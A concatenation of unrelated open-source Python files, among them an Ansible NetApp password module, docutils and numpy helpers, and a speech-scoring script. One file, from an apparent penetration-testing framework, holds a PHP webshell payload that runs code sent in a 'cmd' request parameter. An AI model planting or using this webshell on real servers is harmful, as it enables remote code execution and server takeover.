description: Success message
returned: success
type: string
sample: "Password Updated Successfully"
'''
import json
import traceback
from ansible.module_utils.api import basic_auth_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import HTTPError
from ansible.module_utils._text import to_native
from ansible.module_utils.urls import open_url
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
"x-netapp-password-validate-method": "none"
}
def request(url, data=None, headers=None, method='GET', use_proxy=True,
force=False, last_mod_time=None, timeout=10, validate_certs=True,
url_username=None, url_password=None, http_agent=None, force_basic_auth=True, ignore_errors=False):
try:
r = open_url(url=url, data=data, headers=headers, method=method, use_proxy=use_proxy,
force=force, last_mod_time=last_mod_time, timeout=timeout, validate_certs=validate_certs,
url_username=url_username, url_password=url_password, http_agent=http_agent,
force_basic_auth=force_basic_auth)
except HTTPError as e:
r = e.fp
try:
raw_data = r.read()
if raw_data:
data = json.loads(raw_data)
else:
raw_data = None
except:
if ignore_errors:
pass
else:
raise Exception(raw_data)
resp_code = r.getcode()
if resp_code >= 400 and not ignore_errors:
raise Exception(resp_code, data)
else:
return resp_code, data
def get_ssid(module, name, api_url, user, pwd):
count = 0
all_systems = 'storage-systems'
systems_url = api_url + all_systems
rc, data = request(systems_url, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
for system in data:
if system['name'] == name:
count += 1
if count > 1:
module.fail_json(
msg="You supplied a name for the Storage Array but more than 1 array was found with that name. " +
"Use the id instead")
else:
ssid = system['id']
else:
continue
if count == 0:
module.fail_json(msg="No storage array with the name %s was found" % name)
else:
return ssid
def get_pwd_status(module, ssid, api_url, user, pwd):
pwd_status = "storage-systems/%s/passwords" % ssid
url = api_url + pwd_status
try:
rc, data = request(url, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
return data['readOnlyPasswordSet'], data['adminPasswordSet']
except HTTPError as e:
module.fail_json(msg="There was an issue with connecting, please check that your "
"endpoint is properly defined and your credentials are correct: %s" % to_native(e))
def update_storage_system_pwd(module, ssid, pwd, api_url, api_usr, api_pwd):
"""Update the stored storage-system password"""
update_pwd = 'storage-systems/%s' % ssid
url = api_url + update_pwd
post_body = json.dumps(dict(storedPassword=pwd))
try:
rc, data = request(url, data=post_body, method='POST', headers=HEADERS, url_username=api_usr,
url_password=api_pwd, validate_certs=module.validate_certs)
return rc, data
except Exception as e:
module.fail_json(msg="Failed to update system password. Id [%s]. Error [%s]" % (ssid, to_native(e)))
def set_password(module, ssid, api_url, user, pwd, current_password=None, new_password=None, set_admin=False):
"""Set the storage-system password"""
set_pass = "storage-systems/%s/passwords" % ssid
url = api_url + set_pass
if not current_password:
current_password = ""
post_body = json.dumps(
dict(currentAdminPassword=current_password, adminPassword=set_admin, newPassword=new_password))
try:
rc, data = request(url, method='POST', data=post_body, headers=HEADERS, url_username=user, url_password=pwd,
ignore_errors=True, validate_certs=module.validate_certs)
except Exception as e:
module.fail_json(msg="Failed to set system password. Id [%s]. Error [%s]" % (ssid, to_native(e)),
exception=traceback.format_exc())
if rc == 422:
post_body = json.dumps(dict(currentAdminPassword='', adminPassword=set_admin, newPassword=new_password))
try:
rc, data = request(url, method='POST', data=post_body, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
except:
# TODO(lorenp): Resolve ignored rc, data
module.fail_json(msg="Wrong or no admin password supplied. Please update your playbook and try again")
if int(rc) >= 300:
module.fail_json(msg="Failed to set system password. Id [%s] Code [%s]. Error [%s]" % (ssid, rc, data))
rc, update_data = update_storage_system_pwd(module, ssid, new_password, api_url, user, pwd)
if int(rc) < 300:
return update_data
else:
module.fail_json(msg="%s:%s" % (rc, update_data))
def main():
argument_spec = basic_auth_argument_spec()
argument_spec.update(dict(
name=dict(required=False, type='str'),
ssid=dict(required=False, type='str'),
current_password=dict(required=False, no_log=True),
new_password=dict(required=True, no_log=True),
set_admin=dict(required=True, type='bool'),
api_url=dict(required=True),
api_username=dict(required=False),
api_password=dict(required=False, no_log=True)
)
)
module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=[['name', 'ssid']],
required_one_of=[['name', 'ssid']])
name = module.params['name']
ssid = module.params['ssid']
current_password = module.params['current_password']
new_password = module.params['new_password']
set_admin = module.params['set_admin']
user = module.params['api_username']
pwd = module.params['api_password']
api_url = module.params['api_url']
module.validate_certs = module.params['validate_certs']
if not api_url.endswith('/'):
api_url += '/'
if name:
ssid = get_ssid(module, name, api_url, user, pwd)
ro_pwd, admin_pwd = get_pwd_status(module, ssid, api_url, user, pwd)
if admin_pwd and not current_password:
module.fail_json(
msg="Admin account has a password set. " +
"You must supply current_password in order to update the RO or Admin passwords")
if len(new_password) > 30:
module.fail_json(msg="Passwords must not be greater than 30 characters in length")
result = set_password(module, ssid, api_url, user, pwd, current_password=current_password,
new_password=new_password, set_admin=set_admin)
module.exit_json(changed=True, msg="Password Updated Successfully",
password_set=result['passwordSet'],
password_status=result['passwordStatus'])
if __name__ == '__main__':
main()
|
mohsraspi/mhscs14
|
refs/heads/master
|
robert/pyramid2.py
|
1
|
import minecraft as minecraft
import time
mc= minecraft.Minecraft.create()
friendgame = minecraft.Minecraft.create("10.52.4.54")
#position = friendgame.player.getTilePos()
#x = position.x
#y = position.y
#z = position.z
x = 110
y = 33
z = -70
base = 5
x1 = x
x2 = x + base
z1 = z
z2 = z + base
while x2 - x1>=0:
friendgame.setBlocks(x1,y,z1,x2,y,z2,46,1)
x1 = x1+1
x2 = x2 - 1
z1 = z1+1
z2 = z2 -1
y = y+1
|
ver007/Beebeeto-framework
|
refs/heads/master
|
demo/utils/payload/webshell/php.py
|
20
|
#author: fyth
from webshell import *
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
|
leeping/mdtraj
|
refs/heads/master
|
mdtraj/testing/docscrape.py
|
17
|
"""Extract reference documentation from the NumPy source tree.
"""
# This code is copied directly from numpy
# numpy / doc / sphinxext / docscrape.py
# Copyright (c) 2005-2011, NumPy Developers.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NumPy Developers nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function, division
import inspect
import textwrap
import re
import pydoc
from warnings import warn
from mdtraj.utils.six import StringIO, iteritems
class Reader(object):
"""A line-based string reader.
"""
def __init__(self, data):
"""
Parameters
----------
data : str
String with lines separated by '\n'.
"""
if isinstance(data,list):
self._str = data
else:
self._str = data.split('\n') # store string as list of lines
self.reset()
def __getitem__(self, n):
return self._str[n]
def reset(self):
self._l = 0 # current line nr
def read(self):
if not self.eof():
out = self[self._l]
self._l += 1
return out
else:
return ''
def seek_next_non_empty_line(self):
for l in self[self._l:]:
if l.strip():
break
else:
self._l += 1
def eof(self):
return self._l >= len(self._str)
def read_to_condition(self, condition_func):
start = self._l
for line in self[start:]:
if condition_func(line):
return self[start:self._l]
self._l += 1
if self.eof():
return self[start:self._l+1]
return []
def read_to_next_empty_line(self):
self.seek_next_non_empty_line()
def is_empty(line):
return not line.strip()
return self.read_to_condition(is_empty)
def read_to_next_unindented_line(self):
def is_unindented(line):
return (line.strip() and (len(line.lstrip()) == len(line)))
return self.read_to_condition(is_unindented)
def peek(self,n=0):
if self._l + n < len(self._str):
return self[self._l + n]
else:
return ''
def is_empty(self):
return not ''.join(self._str).strip()
class NumpyDocString(object):
def __init__(self, docstring, config={}):
docstring = textwrap.dedent(docstring).split('\n')
self._doc = Reader(docstring)
self._parsed_data = {
'Signature': '',
'Summary': [''],
'Extended Summary': [],
'Parameters': [],
'Returns': [],
'Raises': [],
'Warns': [],
'Other Parameters': [],
'Attributes': [],
'Methods': [],
'See Also': [],
'Notes': [],
'Warnings': [],
'References': '',
'Examples': '',
'index': {}
}
self._parse()
def __getitem__(self,key):
return self._parsed_data[key]
def __setitem__(self,key,val):
if not key in self._parsed_data:
warn("Unknown section %s" % key)
else:
self._parsed_data[key] = val
def _is_at_section(self):
self._doc.seek_next_non_empty_line()
if self._doc.eof():
return False
l1 = self._doc.peek().strip() # e.g. Parameters
if l1.startswith('.. index::'):
return True
l2 = self._doc.peek(1).strip() # ---------- or ==========
return l2.startswith('-'*len(l1)) or l2.startswith('='*len(l1))
def _strip(self,doc):
i = 0
j = 0
for i,line in enumerate(doc):
if line.strip(): break
for j,line in enumerate(doc[::-1]):
if line.strip(): break
return doc[i:len(doc)-j]
def _read_to_next_section(self):
section = self._doc.read_to_next_empty_line()
while not self._is_at_section() and not self._doc.eof():
if not self._doc.peek(-1).strip(): # previous line was empty
section += ['']
section += self._doc.read_to_next_empty_line()
return section
def _read_sections(self):
while not self._doc.eof():
data = self._read_to_next_section()
name = data[0].strip()
if name.startswith('..'): # index section
yield name, data[1:]
elif len(data) < 2:
yield StopIteration
else:
yield name, self._strip(data[2:])
def _parse_param_list(self,content):
r = Reader(content)
params = []
while not r.eof():
header = r.read().strip()
if ' : ' in header:
arg_name, arg_type = header.split(' : ')[:2]
else:
arg_name, arg_type = header, ''
desc = r.read_to_next_unindented_line()
desc = dedent_lines(desc)
params.append((arg_name,arg_type,desc))
return params
_name_rgx = re.compile(r"^\s*(:(?P<role>\w+):`(?P<name>[a-zA-Z0-9_.-]+)`|"
r" (?P<name2>[a-zA-Z0-9_.-]+))\s*", re.X)
def _parse_see_also(self, content):
"""
func_name : Descriptive text
continued text
another_func_name : Descriptive text
func_name1, func_name2, :meth:`func_name`, func_name3
"""
items = []
def parse_item_name(text):
"""Match ':role:`name`' or 'name'"""
m = self._name_rgx.match(text)
if m:
g = m.groups()
if g[1] is None:
return g[3], None
else:
return g[2], g[1]
raise ValueError("%s is not a item name" % text)
def push_item(name, rest):
if not name:
return
name, role = parse_item_name(name)
items.append((name, list(rest), role))
del rest[:]
current_func = None
rest = []
for line in content:
if not line.strip(): continue
m = self._name_rgx.match(line)
if m and line[m.end():].strip().startswith(':'):
push_item(current_func, rest)
current_func, line = line[:m.end()], line[m.end():]
rest = [line.split(':', 1)[1].strip()]
if not rest[0]:
rest = []
elif not line.startswith(' '):
push_item(current_func, rest)
current_func = None
if ',' in line:
for func in line.split(','):
if func.strip():
push_item(func, [])
elif line.strip():
current_func = line
elif current_func is not None:
rest.append(line.strip())
push_item(current_func, rest)
return items
def _parse_index(self, section, content):
"""
.. index: default
:refguide: something, else, and more
"""
def strip_each_in(lst):
return [s.strip() for s in lst]
out = {}
section = section.split('::')
if len(section) > 1:
out['default'] = strip_each_in(section[1].split(','))[0]
for line in content:
line = line.split(':')
if len(line) > 2:
out[line[1]] = strip_each_in(line[2].split(','))
return out
def _parse_summary(self):
"""Grab signature (if given) and summary"""
if self._is_at_section():
return
summary = self._doc.read_to_next_empty_line()
summary_str = " ".join([s.strip() for s in summary]).strip()
if re.compile('^([\w., ]+=)?\s*[\w\.]+\(.*\)$').match(summary_str):
self['Signature'] = summary_str
if not self._is_at_section():
self['Summary'] = self._doc.read_to_next_empty_line()
else:
self['Summary'] = summary
if not self._is_at_section():
self['Extended Summary'] = self._read_to_next_section()
def _parse(self):
self._doc.reset()
self._parse_summary()
for (section,content) in self._read_sections():
if not section.startswith('..'):
section = ' '.join([s.capitalize() for s in section.split(' ')])
if section in ('Parameters', 'Returns', 'Raises', 'Warns',
'Other Parameters', 'Attributes', 'Methods'):
self[section] = self._parse_param_list(content)
elif section.startswith('.. index::'):
self['index'] = self._parse_index(section, content)
elif section == 'See Also':
self['See Also'] = self._parse_see_also(content)
else:
self[section] = content
# string conversion routines
def _str_header(self, name, symbol='-'):
return [name, len(name)*symbol]
def _str_indent(self, doc, indent=4):
out = []
for line in doc:
out += [' '*indent + line]
return out
def _str_signature(self):
if self['Signature']:
return [self['Signature'].replace('*','\*')] + ['']
else:
return ['']
def _str_summary(self):
if self['Summary']:
return self['Summary'] + ['']
else:
return []
def _str_extended_summary(self):
if self['Extended Summary']:
return self['Extended Summary'] + ['']
else:
return []
def _str_param_list(self, name):
out = []
if self[name]:
out += self._str_header(name)
for param,param_type,desc in self[name]:
out += ['%s : %s' % (param, param_type)]
out += self._str_indent(desc)
out += ['']
return out
def _str_section(self, name):
out = []
if self[name]:
out += self._str_header(name)
out += self[name]
out += ['']
return out
def _str_see_also(self, func_role):
if not self['See Also']: return []
out = []
out += self._str_header("See Also")
last_had_desc = True
for func, desc, role in self['See Also']:
if role:
link = ':%s:`%s`' % (role, func)
elif func_role:
link = ':%s:`%s`' % (func_role, func)
else:
link = "`%s`_" % func
if desc or last_had_desc:
out += ['']
out += [link]
else:
out[-1] += ", %s" % link
if desc:
out += self._str_indent([' '.join(desc)])
last_had_desc = True
else:
last_had_desc = False
out += ['']
return out
def _str_index(self):
idx = self['index']
out = []
out += ['.. index:: %s' % idx.get('default','')]
for section, references in iteritems(idx):
if section == 'default':
continue
out += [' :%s: %s' % (section, ', '.join(references))]
return out
def __str__(self, func_role=''):
out = []
out += self._str_signature()
out += self._str_summary()
out += self._str_extended_summary()
for param_list in ('Parameters', 'Returns', 'Other Parameters',
'Raises', 'Warns'):
out += self._str_param_list(param_list)
out += self._str_section('Warnings')
out += self._str_see_also(func_role)
for s in ('Notes','References','Examples'):
out += self._str_section(s)
for param_list in ('Attributes', 'Methods'):
out += self._str_param_list(param_list)
out += self._str_index()
return '\n'.join(out)
def indent(str,indent=4):
indent_str = ' '*indent
if str is None:
return indent_str
lines = str.split('\n')
return '\n'.join(indent_str + l for l in lines)
def dedent_lines(lines):
"""Deindent a list of lines maximally"""
return textwrap.dedent("\n".join(lines)).split("\n")
def header(text, style='-'):
return text + '\n' + style*len(text) + '\n'
class FunctionDoc(NumpyDocString):
def __init__(self, func, role='func', doc=None, config={}):
self._f = func
self._role = role # e.g. "func" or "meth"
if doc is None:
if func is None:
raise ValueError("No function or docstring given")
doc = inspect.getdoc(func) or ''
NumpyDocString.__init__(self, doc)
if not self['Signature'] and func is not None:
func, func_name = self.get_func()
try:
# try to read signature
argspec = inspect.getargspec(func)
argspec = inspect.formatargspec(*argspec)
argspec = argspec.replace('*','\*')
signature = '%s%s' % (func_name, argspec)
except TypeError as e:
signature = '%s()' % func_name
self['Signature'] = signature
def get_func(self):
func_name = getattr(self._f, '__name__', self.__class__.__name__)
if inspect.isclass(self._f):
func = getattr(self._f, '__call__', self._f.__init__)
else:
func = self._f
return func, func_name
def __str__(self):
out = ''
func, func_name = self.get_func()
signature = self['Signature'].replace('*', '\*')
roles = {'func': 'function',
'meth': 'method'}
if self._role:
if not self._roles in roles:
print("Warning: invalid role %s" % self._role)
out += '.. %s:: %s\n \n\n' % (roles.get(self._role,''),
func_name)
out += super(FunctionDoc, self).__str__(func_role=self._role)
return out
class ClassDoc(NumpyDocString):
extra_public_methods = ['__call__']
def __init__(self, cls, doc=None, modulename='', func_doc=FunctionDoc,
config={}):
if not inspect.isclass(cls) and cls is not None:
raise ValueError("Expected a class or None, but got %r" % cls)
self._cls = cls
if modulename and not modulename.endswith('.'):
modulename += '.'
self._mod = modulename
if doc is None:
if cls is None:
raise ValueError("No class or documentation string given")
doc = pydoc.getdoc(cls)
NumpyDocString.__init__(self, doc)
if config.get('show_class_members', True):
if not self['Methods']:
self['Methods'] = [(name, '', '')
for name in sorted(self.methods)]
if not self['Attributes']:
self['Attributes'] = [(name, '', '')
for name in sorted(self.properties)]
@property
def methods(self):
if self._cls is None:
return []
return [name for name,func in inspect.getmembers(self._cls)
if ((not name.startswith('_')
or name in self.extra_public_methods)
and callable(func))]
@property
def properties(self):
if self._cls is None:
return []
return [name for name,func in inspect.getmembers(self._cls)
if not name.startswith('_') and func is None]
|
RasmusD/SiRe
|
refs/heads/master
|
SiReData/txt2lmscore.py
|
1
|
##########################################################################
#Copyright 2015 Rasmus Dall #
# #
#Licensed under the Apache License, Version 2.0 (the "License"); #
#you may not use this file except in compliance with the License. #
#You may obtain a copy of the License at #
# #
#http://www.apache.org/licenses/LICENSE-2.0 #
# #
#Unless required by applicable law or agreed to in writing, software #
#distributed under the License is distributed on an "AS IS" BASIS, #
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.#
#See the License for the specific language governing permissions and #
#limitations under the License. #
##########################################################################
#Takes the txt files in a directory and scores them using a LM outputting
#one .scores file per .txt file containing each word line by line with its
#LM probability.
#Load the SiReImports.pth file
#Note this assumes we are in the SiReData dir when calling the script.
import site
site.addsitedir("../")
import argparse, os, subprocess, dictionary, lattice_tools
import sire_io as io
#Combines all txt files in a dir to one txt file where the others are written line by line.
def combine_txt(indirpath, outfilepath, overwrite=False):
lines = io.load_txt_dir(indirpath)
wf = io.open_writefile_safe(outfilepath, overwrite)
for line in lines:
wf.write(" ".join(line[1:])+"\n")
wf.close()
def score_word_ngram(args):
#Combine all txt files into one for LM scoring in one go.
comb_file = os.path.join(args.outdirpath, "combined.txt")
combine_txt(args.txtdir, comb_file, args.f)
if args.no_tmp_file:
return subprocess.check_output(args.lm_binary+" -ppl "+comb_file+" -lm "+args.lm_path + options, shell=True)
else:
subprocess.call(args.lm_binary+" -ppl "+comb_file+" -lm "+args.lm_path + options +" > "+os.path.join(args.outdirpath, "scored.txt"), shell=True)
return open(os.path.join(args.outdirpath, "scored.txt"), "r").read()
def write_word_score_files(scores, args):
#First split on empty lines and then split on lines
scores = [x.split("\n") for x in scores.split("\n\n")]
#Pop the overall stats
scores.pop(-1)
#Take away unnecessaries
scores = [x[1:-3] for x in scores]
#Fix each line in each entry
for i, e in enumerate(scores):
for n, l in enumerate(e):
l = l.split()
scores[i][n] = l[1]+ " "+ l[-2]
#Match up each scored sent with a txt file.
#This relies on positions when listing txt dir.
#Will fail if other files than txt files in dir or txtdir has been modified since scoring.
#Could also rely on content <- safer see TODO.
txt = os.listdir(args.txtdir)
n = 0
for t in txt:
if ".txt" in t:
wf = io.open_writefile_safe(os.path.join(args.outdirpath, t[:-3]+"scored"), args.f)
for l in scores[n]:
wf.write(l+"\n")
wf.close()
n+=1
#Create all the slfs and a list with paths to each file
def create_lattices_and_list(txtlist, outdirpath, dictionary, overwrite=False):
path_list = []
for txt in txtlist:
path = os.path.join(outdirpath, txt[0]+".phoneme_slf")
#Make the slf
slf = lattice_tools.make_phoneme_slf(txt[1:], dictionary, pronoun_variant=True, no_syll_stress=True)
#Write it out
wf = io.open_writefile_safe(path, overwrite)
for l in slf:
wf.write(l)
wf.close()
#Everything has gone well so we add the path
path_list.append(path)
#Write out the path file.
wf = io.open_writefile_safe(os.path.join(outdirpath, "lattices.list"))
for p in path_list:
wf.write(p+"\n")
wf.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Load a dir of txt and output LM scores for each word in the sent or for the most likely phoneme path for each word from a phoneme LM. This currently supports only SRILM NGRAM LMs.')
parser.add_argument('txtdir', type=str, help="The input directory.")
parser.add_argument('outdirpath', type=str, help="The output directory path.")
parser.add_argument('lm_path', type=str, help="Path to the LM to use.")
parser.add_argument('lm_binary', type=str, help="Path to the LM binary to use. This should be the SRILM NGRAM binary for WORD_NGRAM and SRILM LATTICE_TOOLS for PHONEME_NGRAM.")
parser.add_argument('-lm_type', type=str, help="The type of LM to use.", choices=['WORD_NGRAM', 'PHONEME_NGRAM'], default='WORD_NGRAM')
parser.add_argument('-lm_binary_options', type=str, nargs=argparse.REMAINDER, help="Additional arguments to be forwarded to the ngram binary. This overwrites the defaults for each -lm_type. As these differ for each type please see the code for details of the defaults. Note that the input/output options are always already specified by the arguments passed to this python script.")
parser.add_argument('-f', action="store_true", help="Overwrite all output files without asking.")
parser.add_argument('-no_tmp_file', action="store_true", help="If true a scored.txt file will not be written out and the .scored files produced directly.")
parser.add_argument('-pre_scored', action="store_true", help="Indicates that a scored.txt file already exists and do not need to be remade. I.e. if LM does no need to be run.")
parser.add_argument('-lattices_exist', action="store_true", help="Indicates that lattices have already been created for each txt file and resides in the outdirpath.")
parser.add_argument('-combilexpath', type=str, help="Path to the combilex dictionary for creating lattices from if lm_type is PHONEME_NGRAM.")
args = parser.parse_args()
if args.lm_binary_options:
options += " "+" ".join(args.lm_binary_options)
else:
if args.lm_type == "WORD_NGRAM":
options = " -debug 2 -tolower -unk"
elif args.lm_type == "PHONEME_NGRAM":
# options = " -viterbi-decode -read-htk -order 4 -debug 1 -no-expansion -nbest-decode 10 -out-nbest-dir "+args.outdirpath
options = " -viterbi-decode -read-htk -order 4 -debug 1 -no-expansion -nbest-decode 10"
if args.f:
options += " -overwrite"
if args.lm_type == "WORD_NGRAM":
if not args.pre_scored:
scores = score_word_ngram(args)
else:
scores = open(os.path.join(args.outdirpath, "scored.txt"), "r").read()
#Do the work
write_word_score_files(scores, args)
elif args.lm_type == "PHONEME_NGRAM":
#First create lattices
if not args.lattices_exist:
txt = io.load_txt_dir(args.txtdir)
dictionary = dictionary.Dictionary(args.combilexpath)
create_lattices_and_list(txt, args.outdirpath, dictionary, args.f)
#Then score them
lattice_list_path = os.path.join(args.outdirpath, "lattices.list")
subprocess.call(args.lm_binary+" -lm "+args.lm_path+" -in-lattice-list "+lattice_list_path+options+" > "+os.path.join(args.outdirpath, "scored.txt"), shell=True)
|
mbauskar/helpdesk-erpnext
|
refs/heads/master
|
erpnext/patches/v5_0/convert_stock_reconciliation.py
|
104
|
import frappe, json
def execute():
# stock reco now amendable
frappe.db.sql("""update tabDocPerm set `amend` = 1 where parent='Stock Reconciliation' and submit = 1""")
frappe.reload_doc("stock", "doctype", "stock_reconciliation_item")
frappe.reload_doctype("Stock Reconciliation")
if frappe.db.has_column("Stock Reconciliation", "reconciliation_json"):
for sr in frappe.db.get_all("Stock Reconciliation", ["name"],
{"reconciliation_json": ["!=", ""]}):
start = False
sr = frappe.get_doc("Stock Reconciliation", sr.name)
for row in json.loads(sr.reconciliation_json):
if start:
sr.append("items", {
"item_code": row[0],
"warehouse": row[1],
"qty": row[2] if len(row) > 2 else None,
"valuation_rate": row[3] if len(row) > 3 else None
})
elif row[0]=="Item Code":
start = True
for item in sr.items:
item.db_update()
|
OptiPop/external_chromium_org
|
refs/heads/opti-5.1
|
content/test/gpu/page_sets/PRESUBMIT.py
|
52
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
def _GetTelemetryPath(input_api):
return os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(
input_api.PresubmitLocalPath())))), 'tools', 'telemetry')
def LoadSupport(input_api):
if 'cloud_storage' not in globals():
# Avoid leaking changes to global sys.path.
_old_sys_path = sys.path
try:
telemetry_path = _GetTelemetryPath(input_api)
sys.path = [telemetry_path] + sys.path
from telemetry.util import cloud_storage
globals()['cloud_storage'] = cloud_storage
finally:
sys.path = _old_sys_path
return globals()['cloud_storage']
def _GetFilesNotInCloud(input_api):
"""Searches for .sha1 files and checks to see if they have already
been uploaded Cloud Storage. Returns a list of those that have not.
"""
hash_paths = []
for affected_file in input_api.AffectedFiles(include_deletes=False):
hash_path = affected_file.AbsoluteLocalPath()
_, extension = os.path.splitext(hash_path)
if extension == '.sha1':
hash_paths.append(hash_path)
if not hash_paths:
return []
cloud_storage = LoadSupport(input_api)
# Look in both buckets, in case the user uploaded the file manually.
hashes_in_cloud_storage = cloud_storage.List(cloud_storage.PUBLIC_BUCKET)
try:
hashes_in_cloud_storage += cloud_storage.List(cloud_storage.INTERNAL_BUCKET)
except (cloud_storage.PermissionError, cloud_storage.CredentialsError):
pass
files = []
for hash_path in hash_paths:
file_hash = cloud_storage.ReadHash(hash_path)
if file_hash not in hashes_in_cloud_storage:
files.append((hash_path, file_hash))
return files
def _VerifyFilesInCloud(input_api, output_api):
"""Fails presubmit if any .sha1 files have not been previously uploaded to
Cloud storage.
"""
results = []
hash_paths = _GetFilesNotInCloud(input_api)
file_paths = []
for hash_path, _ in hash_paths:
results.append(output_api.PresubmitError(
'Attemping to commit hash file, but corresponding '
'data file is not in Cloud Storage: %s' % hash_path))
file_paths.append(os.path.splitext(hash_path)[0])
if len(file_paths) > 0:
upload_script_path = os.path.join(
_GetTelemetryPath(input_api), 'cloud_storage')
results.append(output_api.PresubmitError(
'To upload missing files, Run: \n'
'%s upload %s google-only' %
(upload_script_path, ' '.join(file_paths))))
return results
def CheckChangeOnUpload(input_api, output_api):
results = _VerifyFilesInCloud(input_api, output_api)
return results
def CheckChangeOnCommit(input_api, output_api):
results = _VerifyFilesInCloud(input_api, output_api)
return results
|
timokoola/hslbot
|
refs/heads/master
|
docutils/utils/code_analyzer.py
|
86
|
#!/usr/bin/python
# coding: utf-8
"""Lexical analysis of formal languages (i.e. code) using Pygments."""
# :Author: Georg Brandl; Felix Wiemann; Günter Milde
# :Date: $Date: 2011-12-20 15:14:21 +0100 (Die, 20. Dez 2011) $
# :Copyright: This module has been placed in the public domain.
from docutils import ApplicationError
try:
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters.html import _get_ttype_class
with_pygments = True
except ImportError:
with_pygments = False
# Filter the following token types from the list of class arguments:
unstyled_tokens = ['token', # Token (base token type)
'text', # Token.Text
''] # short name for Token and Text
# (Add, e.g., Token.Punctuation with ``unstyled_tokens += 'punctuation'``.)
class LexerError(ApplicationError):
pass
class Lexer(object):
"""Parse `code` lines and yield "classified" tokens.
Arguments
code -- string of source code to parse,
language -- formal language the code is written in,
tokennames -- either 'long', 'short', or '' (see below).
Merge subsequent tokens of the same token-type.
Iterating over an instance yields the tokens as ``(tokentype, value)``
tuples. The value of `tokennames` configures the naming of the tokentype:
'long': downcased full token type name,
'short': short name defined by pygments.token.STANDARD_TYPES
(= class argument used in pygments html output),
'none': skip lexical analysis.
"""
def __init__(self, code, language, tokennames='short'):
"""
Set up a lexical analyzer for `code` in `language`.
"""
self.code = code
self.language = language
self.tokennames = tokennames
self.lexer = None
# get lexical analyzer for `language`:
if language in ('', 'text') or tokennames == 'none':
return
if not with_pygments:
raise LexerError('Cannot analyze code. '
'Pygments package not found.')
try:
self.lexer = get_lexer_by_name(self.language)
except pygments.util.ClassNotFound:
raise LexerError('Cannot analyze code. '
'No Pygments lexer found for "%s".' % language)
# Since version 1.2. (released Jan 01, 2010) Pygments has a
# TokenMergeFilter. However, this requires Python >= 2.4. When Docutils
# requires same minimal version, ``self.merge(tokens)`` in __iter__ can
# be replaced by ``self.lexer.add_filter('tokenmerge')`` in __init__.
def merge(self, tokens):
"""Merge subsequent tokens of same token-type.
Also strip the final newline (added by pygments).
"""
tokens = iter(tokens)
(lasttype, lastval) = tokens.next()
for ttype, value in tokens:
if ttype is lasttype:
lastval += value
else:
yield(lasttype, lastval)
(lasttype, lastval) = (ttype, value)
if lastval.endswith('\n'):
lastval = lastval[:-1]
if lastval:
yield(lasttype, lastval)
def __iter__(self):
"""Parse self.code and yield "classified" tokens.
"""
if self.lexer is None:
yield ([], self.code)
return
tokens = pygments.lex(self.code, self.lexer)
for tokentype, value in self.merge(tokens):
if self.tokennames == 'long': # long CSS class args
classes = str(tokentype).lower().split('.')
else: # short CSS class args
classes = [_get_ttype_class(tokentype)]
classes = [cls for cls in classes if cls not in unstyled_tokens]
yield (classes, value)
class NumberLines(object):
"""Insert linenumber-tokens at the start of every code line.
Arguments
tokens -- iterable of ``(classes, value)`` tuples
startline -- first line number
endline -- last line number
Iterating over an instance yields the tokens with a
``(['ln'], '<the line number>')`` token added for every code line.
Multi-line tokens are splitted."""
def __init__(self, tokens, startline, endline):
self.tokens = tokens
self.startline = startline
# pad linenumbers, e.g. endline == 100 -> fmt_str = '%3d '
self.fmt_str = '%%%dd ' % len(str(endline))
def __iter__(self):
lineno = self.startline
yield (['ln'], self.fmt_str % lineno)
for ttype, value in self.tokens:
lines = value.split('\n')
for line in lines[:-1]:
yield (ttype, line + '\n')
lineno += 1
yield (['ln'], self.fmt_str % lineno)
yield (ttype, lines[-1])
|
chaowyc/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/drbonanza.py
|
109
|
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
)
class DRBonanzaIE(InfoExtractor):
